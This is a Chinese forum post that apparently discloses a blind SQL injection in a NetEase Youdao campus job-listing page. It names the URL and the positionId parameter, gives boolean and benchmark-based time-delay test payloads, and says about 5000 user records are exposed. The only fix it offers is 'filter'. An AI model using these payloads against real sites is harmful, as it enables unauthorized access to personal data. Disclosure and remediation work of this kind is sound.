goback add

网易有道某分站盲注及修复

2685 点击·0 回帖
灯火互联
灯火互联
楼主
网易有道某分站盲注,导致用户信息泄漏地址:http://campus.youdao.com/campus/job_list.php?t1=campus;positionId=1

漏洞的参数是positionId,用and语句判断存在SQL注入。

http://campus.youdao.com/campus/job_list.php?t1=campus;positionId=1 and 1=1 返回正确
http://campus.youdao.com/campus/job_list.php?t1=campus;positionId=1 and 1=2 返回错误

图片:20121114105402593.jpg



然后用benchmark函数判断存在盲注,明显有延时。

http://campus.youdao.com/campus/job_list.php?t1=campus;positionId=1 and if(1,benchmark(500000,md5(1)),1)


图片:20121114105402491.jpg





大概5000+用户信息。


修复方案:

过滤

喜欢0 评分0
回复

切换至电脑版

Powered by phpwind.me ©2003-2014